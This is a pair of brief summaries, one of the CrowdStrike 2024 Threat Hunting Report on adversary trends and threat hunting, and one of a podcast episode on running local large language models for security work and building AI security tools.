  • The CrowdStrike 2024 Threat Hunting Report analyzes the evolving cyber threat landscape over the past year. It highlights the rise of stealthy, cross-domain attacks targeting identity, endpoints, and cloud environments. The report emphasizes the increasing use of legitimate tools like RMM software by adversaries for malicious purposes and insider threats exploiting recruitment processes. CrowdStrike's OverWatch team uses threat intelligence, AI, and proactive hunting to detect and disrupt these advanced threats, ultimately strengthening the Falcon platform's defenses. Case studies illustrate real-world examples of adversaries like SCATTERED SPIDER and FAMOUS CHOLLIMA, and detail the tactics used to counter them.

  • This podcast episode discusses using artificial intelligence (AI) to enhance cybersecurity. It focuses on running Large Language Models (LLMs) locally for improved security, pretraining AI models for threat detection and anomaly identification, and building AI-driven proof-of-concept security tools. Specific open-source LLMs like DeepSeek, Tulu-3, and Tongyi are highlighted for their applications in various security tasks. The episode emphasizes the benefits of AI in automating security workflows, improving response times, and reducing alert fatigue. Finally, it promotes building custom AI security tools using readily available technologies like Docker and Fast-LLM.